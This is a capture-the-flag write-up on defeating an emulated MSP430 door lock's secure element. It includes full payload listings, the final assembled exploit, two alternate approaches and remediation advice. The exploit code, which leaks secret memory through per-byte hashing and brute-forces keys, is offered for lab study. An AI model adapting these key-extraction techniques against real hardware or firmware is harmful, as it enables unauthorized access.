       │1d53     │inc  r13             │
       ├─────────┼─────────────────────┤
       │824d 0a80│mov  r13, &0x800a    │
       ├─────────┼─────────────────────┤       ┌──────┐
       │0d12     │push r13             │       │      │
       ├─────────┼─────────────────────┤       │ DATA │
       │0d12     │push r13             │       │      │
       ├─────────┼─────────────────────┤       ├──────┤
       │0d12     │push r13             │       │ 3040 │
       ├─────────┼─────────────────────┤       ├──────┤
       │0d12     │push r13             │       │ 0080 │
       ├─────────┼─────────────────────┤       ├──────┤
       │2312     │push #0x2            │       │ FFFF │
       ├─────────┼─────────────────────┤       ├──────┤
       │2312     │push #0x2            │       │ 0003 │
       ├─────────┼─────────────────────┤       ├──────┤      ┌────┐
       │3012 4100│push #0x41           │       │ FFAF │      │R7: │
       ├─────────┼─────────────────────┤       ├──────┤ LOAD¹├────┤
       │b012 5045│call #0x4550 <INT>   │       │ 00b5 ├─────►│B500│
       ├─────────┼─────────────────────┤       ├──────┤      └─┬──┘
       │3150 0e00│add  #0xe, sp        │       │ .... │        │
       ├─────────┼─────────────────────┤       ├──────┤        │
       │3240 00ff│mov  #0xff00, sr     │       │ .... │        │
       ├─────────┼─────────────────────┤       └──────┘        │
       │b012 1000│call #0x10           │                       │
┌───┐  ├─────────┼─────────────────────┤       ┌─────────────┐ │
│PC¹├─►│1742 0c80│mov  &0x800c, r7     │       │   COMPARE²  │ │
├───┤  ├─────────┼─────────────────────┤       ├─────────────┤ │
│PC²├─►│0d97     │cmp  r7, r13         │       │             │ │
├───┤  ├─────────┼─────────────────────┤       │ ┌───┐ ┌───┐ │ │
│PC³├─►│0424     │jz   $+0xa           ├─────┐ │ │R7 │ │R13│ │◄┘
└───┘  ├─────────┼─────────────────────┤     │ │ └───┘ └───┘ │
       │3040 6880│br   #0x8068         │     │ │             │
       └─────────┴─────────────────────┘     │ └─────────────┘
                                             │
                 ┌───────────┐               │
                 │NULL MEMORY│◄──────────────┘
                 └─────┬─────┘  JUMP IF EQUAL³
                       │
                       ▼
                 ┌───────────┐
                 │---CRASH---│
                 └───────────┘

This word is as follows:

3040 0080 ffff 0003
ffaf 00b5 0000 0000
0000 0000 0000 0000
0000 0000 0000 0000
0000 0000 0000 0000
0000 0000 0000 0000

The leaked SRAM data in the shadow buffer usually ranges from address 0xB000 to 0xB140, but this is not guaranteed. This section of the payload code assumes the maximum length is 0x500. Execution branches back to the section that refreshes the shadow buffer if the address of the current offset is less than 0xB500.
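The data section words are stored little-endian, so each pair of bytes in the hex dump reads back-to-front. The sketch below decodes the first six words with Python's struct module. The base address 0x8002 is an assumption inferred from the counter (the fifth word) being accessed at 0x800a.

```python
import struct

DATA_BASE = 0x8002  # assumption: inferred from the fifth word living at 0x800a
data = bytes.fromhex("3040 0080 ffff 0003 ffaf 00b5")

words = struct.unpack("<6H", data)  # six little-endian 16-bit words
for i, word in enumerate(words):
    print(f"{DATA_BASE + 2 * i:#06x}: {word:#06x}")
```

Read this way, the fourth word is 0x0300 (the number of bytes leaked), the fifth is 0xAFFF (the counter before its first increment), and the sixth is 0xB500 (the address at which the loop gives up).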



      ┌─────────┬─────────────────────┐
      │3e40 00f0│mov  #0xf000, r14    │
      ├─────────┼─────────────────────┤
      │3f40 0090│mov  #0x9000, r15    │
      ├─────────┼─────────────────────┤
      │b012 6845│call #0x4568 <getsn> │
      ├─────────┼─────────────────────┤
      │3d40 0010│mov  #0x1000, r13    │◄───────┐
      ├─────────┼─────────────────────┤        │
      │3e40 0090│mov  #0x9000, r14    │        │
      ├─────────┼─────────────────────┤        │
      │3f40 00b0│mov  #0xb000, r15    │        │
      ├─────────┼─────────────────────┤        │
      │b012 a445│call #0x45a4 <memcpy>│        │
      ├─────────┼─────────────────────┤        │
      │1d42 0a80│mov  &0x800a, r13    │        │
      ├─────────┼─────────────────────┤        │
      │1d53     │inc  r13             │        │
      ├─────────┼─────────────────────┤        │
      │824d 0a80│mov  r13, &0x800a    │        │
      ├─────────┼─────────────────────┤        │
      │0d12     │push r13             │        │
      ├─────────┼─────────────────────┤        │
      │0d12     │push r13             │        │
      ├─────────┼─────────────────────┤        │
      │0d12     │push r13             │        │
      ├─────────┼─────────────────────┤        │
      │0d12     │push r13             │        │
      ├─────────┼─────────────────────┤        │
      │2312     │push #0x2            │        │
      ├─────────┼─────────────────────┤        │
      │2312     │push #0x2            │        │
      ├─────────┼─────────────────────┤        │
      │3012 4100│push #0x41           │        │
      ├─────────┼─────────────────────┤        │
      │b012 5045│call #0x4550 <INT>   │        │
      ├─────────┼─────────────────────┤        │
      │3150 0e00│add  #0xe, sp        │        │
      ├─────────┼─────────────────────┤        │
      │3240 00ff│mov  #0xff00, sr     │        │
      ├─────────┼─────────────────────┤        │
      │b012 1000│call #0x10           │        │
      ├─────────┼─────────────────────┤        │
      │1742 0c80│mov  &0x800c, r7     │        │
      ├─────────┼─────────────────────┤        │
      │0d97     │cmp  r7, r13         │        │
      ├─────────┼─────────────────────┤        │
      │0424     │jz   $+0xa           │        │
┌──┐  ├─────────┼─────────────────────┤ BRANCH │
│PC├─►│3040 6880│br   #0x8068         ├────────┘
└──┘  └─────────┴─────────────────────┘
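For readers who prefer a higher-level view, the loop above can be modeled in a few lines of Python. This is a sketch of the control flow only, not a replacement for the assembly: try_key is a hypothetical callback standing in for the interrupt call plus the unlock attempt, and the zero padding assumes that memory past the leaked data reads as zero.

```python
from typing import Callable, Optional

SHADOW_BASE = 0xB000  # start of the shadow buffer
LIMIT = 0xB500        # last defined word in the data section (00b5 at 0x800c)
KEY_LEN = 16


def brute_force(canonical: bytes, try_key: Callable[[bytes], bool]) -> Optional[int]:
    """Return the shadow-buffer address of the first accepted candidate, or None."""
    pointer = SHADOW_BASE - 1                       # the counter starts at 0xAFFF
    while True:
        shadow = bytearray(canonical)               # memcpy: refresh the shadow copy
        pointer += 1                                # inc r13
        offset = pointer - SHADOW_BASE
        window = bytes(shadow[offset:offset + KEY_LEN])
        candidate = window.ljust(KEY_LEN, b"\x00")  # assumption: unused memory is zero
        if try_key(candidate):                      # stands in for INT + unlock attempt
            return pointer
        if pointer == LIMIT:                        # cmp r7, r13 / jz into null memory
            return None


leak = bytes(range(0x40))  # placeholder data, not a real SRAM dump
secret = leak[10:26]       # pretend the key sits at offset 10
found = brute_force(leak, lambda key: key == secret)
print(hex(found))
```

The shadow copy is rebuilt on every iteration, mirroring the memcpy at the top of the loop, so any side effect of one attempt cannot leak into the next.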

The assembled payload is below.

8000 ff

183c
3040 0080 ffff 0003
ffaf 00b5 0000 0000
0000 0000 0000 0000
0000 0000 0000 0000
0000 0000 0000 0000
0000 0000 0000 0000

3440 0280 a244 ee44 2453 a244 f044

0d41
3e40 0100
1f42 0680
1f53
824f 0680
1642 0880
0f96
0224
3040 a644

3e40 00f0 3f40 0090 b012 6845

3d40 0010
3e40 0090
3f40 00b0
b012 a445

1d42 0a80
1d53
824d 0a80

0d12
0d12
0d12
0d12
2312
2312

3012 4100
b012 5045
3150 0e00

3240 00ff b012 1000

1742 0c80
0d97
0424
3040 6880

Results and Analysis

Running this payload with either big- or little-endian SRAM data results in the following output.

insn address unaligned
CPUOFF flag set; program no longer running. CPU must now be reset.

Payload execution completes without any key candidate unblocking the unlock interrupt. There are a few plausible explanations for this.

Stripping an additional layer of encoding from the SRAM data is necessary.

Unlikely. It might be reasonable to assume the presence of encoding if the extracted data had a consistent format (many non-whitespace characters and multiple equal signs might indicate base64, for example), but the hexdump of the data does not seem to have any discernible pattern.

The calling convention requires the key to be passed directly on the stack rather than as a pointer.

This one is slightly more realistic, but (given that this system uses a 16-bit processor) a value that is eight words wide is relatively large to pass directly on the stack. Passing the literal value would make more sense with a small key value (e.g., 1 or 2 words). The payload code required to test this is inconvenient to implement, so this possibility is discounted for now.

The interrupt number is simply wrong.

This scenario is absurd but possible.

Here Be Dragons

The third option is worthy of consideration in the absence of saner alternatives. The correct interrupt number may not be 0x41.

Strange Behavior

This theory is not as far-fetched as it might at first appear. Recall the calling convention for the 0x41 interrupt call. There are only a few stack locations to pass a key pointer.

      ┌────────────────────────────────────────┐
      │                 STACK                  │
┌──┐  ├──────┬─────────────────────────────────┤
│SP├─►│SP+0x0│0x41 (INTERRUPT NUMBER)          │
└──┘  ├──────┼─────────────────────────────────┤
      │SP+0x2│OFFSET                           │
      ├──────┼─────────────────────────────────┤
      │SP+0x4│LENGTH                           │
      ├──────┼─────────────────────────────────┤
      │SP+0x6│POINTER TO CHECKSUM RETURN BUFFER├──┐
      ├──────┼─────────────────────────────────┤  │
      │SP+0x8│RETURN ADDRESS (MAIN)            │  │
      ├──────┼─────────────────────────────────┤  │
      │SP+0xa│CHECKSUM RETURN BUFFER + 0x0     │◄─┘
      ├──────┼─────────────────────────────────┤
      │SP+0xc│CHECKSUM RETURN BUFFER + 0x2     │
      ├──────┼─────────────────────────────────┤
      │SP+0xe│CHECKSUM RETURN BUFFER + 0x4     │
      └──────┴─────────────────────────────────┘

It is implausible that the implementation would reference a pointer outside the current stack frame, which rules out the first three words of the checksum return buffer. While not impossible, this implementation choice would be so outlandish as to be outright broken.

The only remaining option is the pointer to the checksum return buffer at SP+0x6, which could theoretically double as the pointer to the key. Recall that the interrupt call dereferences this pointer and overwrites the buffer with the SRAM hash.

            ┌───────────────────────────────────────┐
            │        CHECKSUM RETURN BUFFER         │
     ┌───┐  ├───────────────────────────────────────┤
     │KEY├─►│AAAA AAAA AAAA AAAA AAAA AAAA AAAA AAAA├─┐
     └───┘  ├───────────────────────────────────────┤ │
            │0000 0000 0000 0000 0000 0000 0000 0000│ │
            └───────────────────────────────────────┘ │
                                                      ▼
                                            ┌────────────────────┐
                                            │CALL sha256_internal│
                                            └─────────┬──────────┘
                                                      │
            ┌───────────────────────────────────────┐ │
            │        CHECKSUM RETURN BUFFER         │ │
┌────────┐  ├───────────────────────────────────────┤ │
│KEY     ├─►│XXXX XXXX XXXX XXXX XXXX XXXX XXXX XXXX│◄┘
│OVER    │  ├───────────────────────────────────────┤
│WRITTEN │  │XXXX XXXX XXXX XXXX XXXX XXXX XXXX XXXX│
│BY      │  └───────────────────────────────────────┘
│CHECKSUM│
└────────┘

Combining two disparate pieces of functionality (hashing SRAM and passing the key) into a single interrupt call is odd. The returned SRAM hash would clobber the key. The side effect is, for lack of a better word, inelegant. It would be cleaner to separate these two pieces of functionality into different interrupt calls.
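The clobbering side effect is easy to see in a toy model. The sketch below is purely hypothetical: model_int_0x41 is not the real interrupt, it hashes its whole input rather than an offset and length, and it exists only to illustrate what would happen if one buffer served as both key input and checksum output.

```python
import hashlib

KEY_LEN = 16
DIGEST_LEN = 32  # a SHA-256 digest is 32 bytes long


def model_int_0x41(sram: bytes, buffer: bytearray) -> bytes:
    """Hypothetical model: read a key from the buffer, then overwrite it with the hash."""
    key = bytes(buffer[:KEY_LEN])                        # key is read first
    buffer[:DIGEST_LEN] = hashlib.sha256(sram).digest()  # checksum lands on top of it
    return key


buffer = bytearray(b"\xaa" * KEY_LEN + bytes(KEY_LEN))
seen_key = model_int_0x41(b"placeholder sram contents", buffer)
print(seen_key.hex())
print(buffer.hex())
```

After the call, the buffer no longer contains the key, which is why a design like this would force the caller to rewrite the key before every attempt.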

Psychological Warfare

Recall the description from the "manual" command.

Any payload is allowed, because the unlock key must be passed to the new interrupt with code 0x41, and this key is only stored in secure memory.

The I/O console prints the following output on each run.

0x7f interrupt disabled, key stored in internal SRAM
unlock by providing the 16 byte key to 0x41 interrupt

A developer making the same typo in two places is improbable, which implies that if the interrupt number is inaccurate, it is most likely deliberate and meant to hinder reverse engineering efforts. The information conveyed in the manual and status messages may be an instance of psychological warfare.

Interrupt Number Groupings

Extending the shellcode to automatically brute-force the interrupt number is possible, but it is quicker to increment it by hand after narrowing the probable range. The manual PDF does not document the new interrupts, but the old ones seem to be grouped by the leading nibble of the interrupt number.

Interrupt Number Groupings
Type	Number
I/O	0x00
I/O	0x01
I/O	0x02
DEP	0x10
DEP	0x11
HSM	0x7D
HSM/Unlock	0x7E
Unlock	0x7F

This scheme suggests that all interrupts used for interfacing with the secure element fall into the 0x40-0x4F range.
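The grouping can be checked with a short Python sketch. The interrupt numbers and labels are copied from the table above; the helper name same_group is an illustrative assumption.

```python
from collections import defaultdict

# Documented interrupts, copied from the table above.
documented = {
    0x00: "I/O", 0x01: "I/O", 0x02: "I/O",
    0x10: "DEP", 0x11: "DEP",
    0x7D: "HSM", 0x7E: "HSM/Unlock", 0x7F: "Unlock",
}

# Group the documented interrupts by their leading nibble.
groups = defaultdict(list)
for number, kind in documented.items():
    groups[number >> 4].append((hex(number), kind))


def same_group(number: int):
    """All interrupt numbers that share a leading nibble with `number`."""
    base = number & 0xF0
    return list(range(base, base + 0x10))


candidates = same_group(0x41)
print(dict(groups))
print([hex(n) for n in candidates])
```

Sixteen candidates is a small enough range to step through by hand, which is the approach taken in the attempts that follow.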

Payload Modifications

Attempt 1

The likely place to start is with the other known interrupt in that range: 0x40. The firmware pushes two placeholder null words before the interrupt number. Either one of these might be a pointer to the key.

444a:  mov	#0x4658 "Enabling hardened mode", r15
444e:  call	#0x4586 <puts>
4452:  push	#0x0
4454:  push	#0x0
4456:  push	#0x40
445a:  call	#0x4550 <INT>

Modified Payload

0d12           push	r13
0d12           push	r13
0d12           push	r13
0d12           push	r13
0d12           push	r13
0d12           push	r13
3012 4000      push	#0x40
b012 5045      call	#0x4550
3150 0e00      add	#0xe, sp

The interrupt number is decremented by one, from 0x41 to 0x40. The dummy values (0x2) are replaced with the value of R13, as it is no longer necessary to adhere to the calling convention for the 0x41 interrupt.

Assembling and running the modified payload results in the following output at the debug console.

insn address unaligned
CPUOFF flag set; program no longer running. CPU must now be reset.

This crash indicates that the loop ended without sending a valid key to the correct interrupt.

Attempt 2

The next logical step is to try every possible interrupt in the 0x40-0x4F range, starting with 0x42.

Modified Payload

0d12           push	r13
0d12           push	r13
0d12           push	r13
0d12           push	r13
0d12           push	r13
0d12           push	r13
3012 4200      push	#0x42
b012 5045      call	#0x4550
3150 0e00      add	#0xe, sp
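Since only the immediate operand changes between attempts, the probe can be generated rather than edited by hand. The Python sketch below is a hypothetical helper (build_probe is not part of the original tooling) that emits the same instruction encodings shown in the listings above, with the interrupt number written as a little-endian immediate.

```python
def build_probe(interrupt_number):
    """Return the probe shellcode as a list of hex strings, one per instruction.

    Encodings are copied from the listings above:
      0d12       push r13
      3012 xxxx  push #imm   (immediate stored little-endian)
      b012 5045  call #0x4550
      3150 0e00  add  #0xe, sp
    """
    if not 0 <= interrupt_number <= 0xFFFF:
        raise ValueError("interrupt number must fit in 16 bits")
    lines = ["0d12"] * 6                                  # six placeholder arguments
    immediate = interrupt_number.to_bytes(2, "little").hex()
    lines.append(f"3012 {immediate[:4]}")                 # push the interrupt number
    lines.append("b012 5045")                             # call the INT stub
    lines.append("3150 0e00")                             # drop 7 words (14 bytes)
    return lines


# Print one probe per remaining candidate in the 0x40-0x4F range.
for number in range(0x42, 0x50):
    print(hex(number), " ".join(build_probe(number)))
```

For interrupt 0x42 the generated push instruction is 3012 4200, which matches the corresponding line of the final exploit.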

Authentication Bypass

Running the above payload and submitting the leaked SRAM data in big-endian format causes the unlock interrupt to trigger successfully.

Door Unlocked
The CPU completed in 4893366 cycles.

Final Exploit

8000 ff

183c
3040 0080 ffff 0003
ffaf 00b5 0000 0000
0000 0000 0000 0000
0000 0000 0000 0000
0000 0000 0000 0000
0000 0000 0000 0000

3440 0280 a244 ee44 2453 a244 f044

0d41
3e40 0100
1f42 0680
1f53
824f 0680
1642 0880
0f96
0224
3040 a644

3e40 00f0 3f40 0090 b012 6845

3d40 0010
3e40 0090
3f40 00b0
b012 a445

1d42 0a80
1d53
824d 0a80

0d12
0d12
0d12
0d12
0d12
0d12

3012 4200
b012 5045
3150 0e00

0312 0312 3012 7f00 b012 5045
3150 0600

1742 0c80
0d97
0424
3040 6880

Conclusion

Bug Reporting

After completing this challenge, it was worth reaching out to the creators and inquiring (as part of a report about multiple unrelated issues) whether the erroneous interrupt number in the manual and status messages was a deliberate attempt at psychological warfare.

Note: The new backend brought with it numerous ~~bugs~~ features. Those who thought the original set was too easy will praise the introduction of hard mode, in the form of the new and improved (dis)assembler.

The nature of the typo makes a subtle psychological difference: one reference might be mistaken, but multiple sources saying the same thing isn't an accident. [...] If the goal is to make it look like a mistake, only reference it in one place or not at all. If the goal is to make it look malicious, a third option is to add some window dressing to the level manual about how LockItAll hired a "psychological warfare specialist" to make their device unhackable.
— Email to challenge creators, November 1st, 2022

Competitive Sabotage

The same email included advice not to fix the typo if it was one.

If I had to suffer then everyone else should too :)
— Email to challenge creators, November 1st, 2022

Antics aside, there was an actual reason for this.

I liked the black box analysis angle. [...] [M]ake people infer that something in the 0x40-0x4f range must be the undocumented interrupt based on comparing it to the other known interrupt values. [...] I think it reinforces a useful philosophical mindset: don't trust the device developers too much, because if they knew what they were doing then the device wouldn't have vulnerabilities to begin with. Quite a few of the original 19 levels lied in the level manual or in the program output (about max password lengths or how the HSM-2 worked, for example). I think a deliberate typo or lie about actual interrupt numbers is a nice progression.
— Email to challenge creators, November 1st, 2022

It remains unclear whether the creators took this advice. The only response was as follows.

Apologies for the delay, you hit us up at an awkward time. And thank you for your well thought out description. We're looking into it.
— Response email, November 17th, 2022

Alternate Approaches

Two alternate solutions were written several months after the one described herein. Both bear review, as each takes a different approach.

Writeup by John Breaux

John Breaux published a writeup several months ago documenting a similar solution.

Alternate Leak Code

The main point of difference in this case was the decision to leak only the first few bytes of each hash.

There should be a way to uniquely identify a single byte using the first n bytes of output. We can find n by computing the hashes of the numbers 00-ff, and counting how many unique sequences there are when truncating those hashes to a certain length. [...] The start of my payload, which defines some constants, then saves 3 bytes of the hash of each byte in the internal SRAM, for later printing. — John Breaux

This trick makes it possible to represent the underlying SRAM data in fewer bytes, resulting in more compact information leak output. The following code accomplishes this.

get_sram_hashes:
    clr   r11            ; loop variable in r11
    mov   #msize, r14    ; r14 = 1
    mov   #haddr, r13    ; set destination to 0x8000
sr_loop:
    mov   r11, r15       ; mov addr r15
    call  sha256_internal ; <sha256_internal>
    add   #hsize, r13    ; keep 3 bytes of the output
    inc   r11            ; inc r11
    cmp   #sr_len, r11   ; do that 0x1000 times
    jnc   sr_loop

print_hex:
    clr   r11
ph_loop:
    mov.b haddr(r11), r14
    mov.b r14, r15
    rra   r15            ; using rra here instead of rra.b means the value won't roll into the highest bit
    rra   r15            ; which negates the need to and 0xf, r15
    rra   r15
    rra   r15
    clrc
    and   #0xf, r14
    mov.b HEX_LUT(r15), r15
    call  putchar        ; <putchar>
    mov.b HEX_LUT(r14), r15
    call  putchar        ; <putchar>
    inc   r11            ; inc r11
    cmp   #ha_len, r11   ; do that sram_length*3 times
    jnc   ph_loop

    mov.b #0xa, r15      ; '\n'
    call  #0x4578        ; putchar ('\n')

It is probably simpler to reuse the existing code in main for printing leaked hashes, but this approach is relatively novel and faster in terms of execution speed.
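The truncation length Breaux describes can be checked off-device. The Python sketch below assumes that the secure element hashes one SRAM byte at a time with standard SHA-256 (consistent with msize being 1 in the listing above, but still an assumption). It searches for the shortest hash prefix that still identifies every byte value uniquely. The function names are illustrative.

```python
import hashlib


def truncated_table(n):
    """Map the first n bytes of SHA-256(byte) to the byte values producing it."""
    table = {}
    for value in range(256):
        prefix = hashlib.sha256(bytes([value])).digest()[:n]
        table.setdefault(prefix, []).append(value)
    return table


def smallest_unique_prefix(max_len=32):
    """Return the shortest prefix length with no collisions across 0x00-0xff."""
    for n in range(1, max_len + 1):
        if len(truncated_table(n)) == 256:
            return n
    raise RuntimeError("no unique prefix length found")


def lookup(prefix_hex, n):
    """Recover the original byte from a leaked n-byte hash prefix."""
    values = truncated_table(n)[bytes.fromhex(prefix_hex)]
    if len(values) != 1:
        raise ValueError("prefix is ambiguous at this length")
    return values[0]


n = smallest_unique_prefix()
leaked = hashlib.sha256(b"\x41").digest()[:n].hex()
print(n, leaked, hex(lookup(leaked, n)))
```

Any prefix length at or above the value returned by smallest_unique_prefix is safe to use, so there is some freedom to trade output size against margin.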

Inferior Automation

The partial hash leakage approach ultimately became a liability, as it complicated the implementation and made it harder to spot subtle bugs.

I discovered a string formatting error in my python script that caused it to print /[0-9]/ when it meant /0[0-9]/ — John Breaux

This error corrupted input for the SRAM rainbow table lookup process and prevented Breaux from identifying interrupt 0x42 as the correct one (even though the payload code otherwise should have). The failure was a byproduct of the choice to leak only the first three bytes of each hash, as such a scheme required more convoluted Python code to massage the output back into the correct representation of the source data.
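Breaux's script is not reproduced here, so the following Python sketch only illustrates the general class of bug under the assumption that it involved unpadded hexadecimal byte formatting. Dropping the leading zero shifts every subsequent nibble, so the string still parses but decodes to different data.

```python
def to_hex_unpadded(data):
    # Buggy: "%x" omits the leading zero for any value below 0x10.
    return "".join("%x" % b for b in data)


def to_hex_padded(data):
    # Correct: "%02x" always emits exactly two digits per byte.
    return "".join("%02x" % b for b in data)


sample = bytes([0x0A, 0x1B, 0x05])
bad = to_hex_unpadded(sample)
good = to_hex_padded(sample)

print(bad, good)
print(bytes.fromhex(good) == sample)   # round-trips correctly
print(bytes.fromhex(bad) == sample)    # silently decodes to other bytes
```

A mismatch like this produces lookup keys that are well-formed but absent from the rainbow table, which is consistent with the symptom described above.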

We exhausted our supply of ideas, and eventually concluded that the challenge must be broken. [...] Over the course of the next 6 months, the three of us worked collaboratively to figure out what went wrong.
— John Breaux

Not-So-Psychological-Warfare

Ultimately, someone else informed Breaux that the interrupt number was wrong.

Nothing was working, and it didn't seem to even attempt to use our keys. So, we contacted the challenge authors. No response. [...] But, eventually, a member of the ReSwitched Discord who happens to have access to the project informed us that there was a typo in both the directions and the program itself. — John Breaux

This information seemingly confirms that the erroneous interrupt number was a simple typographic issue rather than a deliberately malicious red herring. (If any of the challenge authors are reading this page, confirmation would be appreciated.)

Aside from the custom leak code, Breaux's approach is more or less identical to the one described herein. While it eventually succeeded, it seems to have been a time-consuming process that required aid from at least three other people.

Timing Analysis

It doesn't [...] take more than one cycle to execute. [...] Most other interrupts, if I remember right, cost something to run—are implemented somewhere within the MSP430 emulator's firmware. Yet this one isn't. It's just bizarre.
— John Breaux

While not directly relevant to the solution, Breaux uses an unorthodox technique to narrow down candidate interrupt numbers. There is a built-in debugger command that prints the current cycle count. Most interrupt calls take a few cycles to execute. By this logic, any interrupt number that takes multiple cycles must be doing something on the backend. Unfortunately, interrupt 0x42 seems to break this assumption.

Read Address Overflow Technique — Developed by Anonymous Author

The second alternate approach, developed several months after the one described herein, does not have a public writeup, but it uses a creative technique to identify the correct interrupt number.

Interrupt Side Effects

When I was poking around with alternate interrupt numbers, I did check if interrupt 0x42 did anything... But it didn't seem to. There are no side effects to calling INT 0x42.
— John Breaux

While a reasonable conclusion, this is not strictly true. Interrupt 0x42 can be made to produce an observable side effect by passing specifically chosen values on the stack.

After ruling out interrupt 0x41, testing subsequent interrupt numbers uses the following stack layout.

      ┌────────────────────────────────────────┐
      │                 STACK                  │
┌──┐  ├──────┬─────────────────────────────────┤
│SP├─►│SP+0x0│0x40-0x4F (INTERRUPT NUMBER)     │
└──┘  ├──────┼─────────────────────────────────┤
      │SP+0x2│KEY POINTER                      │
      ├──────┼─────────────────────────────────┤
      │SP+0x4│KEY POINTER                      │
      ├──────┼─────────────────────────────────┤
      │SP+0x6│KEY POINTER                      │
      ├──────┼─────────────────────────────────┤
      │SP+0x8│KEY POINTER                      │
      ├──────┼─────────────────────────────────┤
      │SP+0xa│KEY POINTER                      │
      ├──────┼─────────────────────────────────┤
      │SP+0xc│KEY POINTER                      │
      └──────┴─────────────────────────────────┘

It would be preferable to determine whether any given call is dereferencing the key pointer. It is possible to detect this on other architectures by providing a pointer to unmapped memory (e.g., a null pointer), which causes a segmentation fault when dereferenced. Inconveniently, the entire memory space is writable by default on this ISA, so dereferencing a null pointer will not cause a crash. A different (anonymous) individual found a way to overcome this limitation.

      ┌────────────────────────────────────────┐
      │                 STACK                  │
┌──┐  ├──────┬─────────────────────────────────┤
│SP├─►│SP+0x0│0x40-0x4F (INTERRUPT NUMBER)     │
└──┘  ├──────┼─────────────────────────────────┤
      │SP+0x2│0xFFFF                           │
      ├──────┼─────────────────────────────────┤
      │SP+0x4│0xFFFF                           │
      ├──────┼─────────────────────────────────┤
      │SP+0x6│0xFFFF                           │
      ├──────┼─────────────────────────────────┤
      │SP+0x8│0xFFFF                           │
      ├──────┼─────────────────────────────────┤
      │SP+0xa│0xFFFF                           │
      ├──────┼─────────────────────────────────┤
      │SP+0xc│0xFFFF                           │
      └──────┴─────────────────────────────────┘

Any attempt to interpret these dummy values as pointers will fail with the following error.

read address would wrap
CPUOFF flag set; program no longer running. CPU must now be reset.

This error occurs because attempting to read a word or multiple bytes starting from that address would cause an integer overflow and a wraparound to address 0x0000, which crashes the processor.
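The emulator's actual bounds check is not visible, so the Python sketch below is only a model of the behaviour described here. It assumes a 16-bit address space and a read that fails whenever its final byte would lie past 0xFFFF. The name read_would_wrap and the 16-byte key length (taken from the status message) are the only inputs.

```python
ADDRESS_SPACE = 0x10000  # 16-bit address space: 0x0000 through 0xFFFF
KEY_LENGTH = 16          # key size stated in the console output


def read_would_wrap(address, length):
    """Return True if reading `length` bytes from `address` runs past 0xFFFF."""
    return address + length > ADDRESS_SPACE


# A single byte at 0xFFFF is still in range, but any multi-byte read is not.
print(read_would_wrap(0xFFFF, 1))           # False
print(read_would_wrap(0xFFFF, 2))           # True
print(read_would_wrap(0xFFFF, KEY_LENGTH))  # True
print(read_would_wrap(0x0000, KEY_LENGTH))  # False: a null pointer reads cleanly
```

Under this model 0xFFFF is the most useful probe value, because it faults for every read longer than one byte, whereas a null pointer never faults at all.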

Out of all interrupts in the 0x40-0x4F range, this only occurs when calling interrupt 0x42. This pattern suggests that only interrupt 0x42 dereferences one of the pointers. The creator of this technique used it to narrow down which interrupts were attempting to read from MCU memory. Aside from that, the rest of their exploit is similar to the one described herein.

Takeaways

Anonymous Author: I am in hell.
Yours Truly: Halifax is in Canada. Technically speaking, it is the exact meteorological opposite of hell.

The exploit by John Breaux is a case study of how tricky it can be to attack an implementation like this. The black box analysis process is fraught with subtle perils, and debugging is often maddening. The read address overflow technique is an example of how to shine more light into the inscrutable abyss.

Remediation

At a conceptual level, the hardware design of this system is an improvement over something like Whitehorse. Adding the logical AND transistor creates a layer of defense in depth enforced at a physics level. Bypassing this protection requires compromising two different chips. That said, there are two failures in this implementation.

1. Do not execute arbitrary user-supplied payloads on the main MCU.

A glaring issue remains unexamined: nothing about this architecture requires it to allow arbitrary unsigned code execution on the main MCU. Debug payloads should be signed, as on St. John's or Cold Lake, or eliminated from the implementation altogether.

This mitigation requires attackers to bypass the signature verification mechanism or find another issue that allows them to gain a foothold on the main MCU, adding another layer of defense-in-depth.

2. Do not implicitly trust third-party vendors to write secure code.

The graver vulnerability lies in the ostensibly third-party secure element. In reality, there is no easy way to audit the backing software implementation for such a system. Patching would be the vendor's responsibility, and there may be no firmware update mechanism.

In the best-case scenario, this requires waiting for the third-party vendor to ship out patches. In the worst-case scenario, it is unpatchable, and fixing the vulnerability requires releasing a new generation of hardware. This risk management "strategy" is commonplace.

The Problem With Hardware Security

The Semantics Of Security Through Obscurity

Secure elements are designed, in part, to protect against hardware attacks. The problem in the hardware security world is that manufacturers tend to conflate two kinds of security through obscurity. There is a credible argument that undocumented hardware countermeasures demonstrably impede attackers. In this sense, the system relies on hardware-level security through obscurity. Disclosing the hardware-level workings of the chip (i.e., data sheets or schematics) would put that protection in jeopardy. This "protection" is a byproduct of the relatively nascent general state of the hardware security field. Falling equipment prices and more accessible education about the subject area will eventually undermine it.

That said, the fact that this logic only applies to physical hardware-level security (not firmware or software security) cannot be overstated. Just because code runs on a processor secured against hardware attacks does not magically make that code secure against software exploits. Regardless of the platform, software security through obscurity is not an effective countermeasure.

The assumption seems to be that hardware-level security implies software-level security. This belief may stem from the assumption that attackers must extract firmware via a hardware attack and that black box firmware analysis is infeasibly expensive. As the exploit described herein demonstrates, this is not always the case.

Secure processor code is like any other code. Performing source code vulnerability analysis and penetration testing is essential. Blind trust in these devices is foolish—especially for security-critical applications.

Patching

Unpatchable black box hardware is depressingly common among chips of this variety. It is critically important to determine, before hardware architecture finalization, whether firmware updates are possible for this type of component and, if so, whether the vendor has responded appropriately to security issues in the past. Any "secure processor" that cannot pass muster should be replaced with one that can.